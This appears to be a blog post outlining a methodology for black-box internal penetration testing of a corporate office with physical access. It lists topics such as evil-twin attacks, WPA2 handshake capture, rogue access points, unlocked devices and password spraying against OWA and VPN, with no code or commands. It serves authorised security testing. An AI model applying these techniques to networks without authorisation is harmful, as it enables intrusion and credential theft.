Real-Time BlackBox Internal Penetration Testing
This blog post majorly covers to get access to the corporate network while conducting the Black-Box Internal Penetration Testing (with physical access to the corporate office) by covering the major areas:
Assessment Process
Areas
Wired
RJ45 (Ethernet) Port
Wireless
Guest SSID
Contractor / Partner SSID
Corporate SSID
Unlocked/Unprotected/Unattended Devices and/or documents
Password Spraying Can be used for Internal/External Pentesting depending on the attack-vector
Wired
NAC Testing
Devices Testing (VoIP, Printer, etc)
Asset Discovery
Scanning & Enumeration
Wireless
Discovering Hidden Networks
Guest SSID Testing
Hunting for connected corporate users
Scanning APs & server subnets
Captive Portal Testing
Rogue access point
Segmentation Testing between guest & corporate network
Contractor / Partner SSID Testing
Connected users
Scanning AP & server subnets
Captive Portal Testing
Rogue access point
Segmentation Testing between contractor segmentation & corporate network
Corporate SSID Testing
Evil-Twin Attack
Handshake Capture
Unlocked/Unprotected/Unattended Devices and/or documents
Unlocked computers/laptops
Unprotected/Unattended devices (eg: advertisement screen connected with the network, kiosk etc)
Credentials on sticky notes
Password Spraying (weak password policy)
Running password spray on OWA/exchange/office.com
Running password spray on VPN
Hint: Credential stealing can be really useful if it can be used to authenticate on corporate SSID
Reference
https://attack.mitre.org/tactics/enterprise/ https://www.sans.org/reading-room/whitepapers/auditing/conducting-penetration-test-organization-67 https://www.eccouncil.org/what-is-penetration-testing/ https://tools.kali.org/wireless-attacks/hostapd-wpe https://blog.pentesteracademy.com/cracking-wpa2-psk-passphrase-in-absence-of-the-access-point-f63116970a48 https://github.com/dafthack/MailSniper
Last updated
Was this helpful?